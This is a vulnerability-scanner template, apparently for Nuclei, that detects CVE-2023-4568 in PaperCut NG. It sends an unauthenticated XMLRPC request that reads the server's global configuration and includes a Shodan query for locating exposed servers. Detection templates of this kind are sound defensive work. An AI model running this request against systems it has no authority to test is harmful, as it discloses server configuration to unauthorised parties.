id: CVE-2023-4568 info: name: PaperCut NG Unauthenticated XMLRPC Functionality author: DhiyaneshDK severity: medium description: | PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-4568 - https://www.tenable.com/security/research/tra-2023-31 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cve-id: CVE-2023-4568 cwe-id: CWE-287 epss-score: 0.00261 epss-percentile: 0.63693 cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: papercut product: papercut_ng shodan-query: html:"content="PaperCut"" tags: cve,cve2023,unauth,papercut http: - raw: - | POST /rpc/clients/xmlrpc HTTP/1.1 Host: {{Hostname}} Content-Type:text/xml client.getGlobalConfigstr1str2 matchers-condition: and matchers: - type: word part: body words: - 'conf.ssl-port' - 'conf.auth-ttl-default' condition: and - type: word part: header words: - text/xml - type: status status: - 200 # digest: 4b0a004830460221009c18f1dbdd9a57188617ff2cd49d2c61585dd1a74b93301d871b44df78cd02b1022100d15aa0acd1549de794657f06b52bc7fdfe831834961445fbb508e00e154fbab4:922c64590222798bb761d5b6d8e72950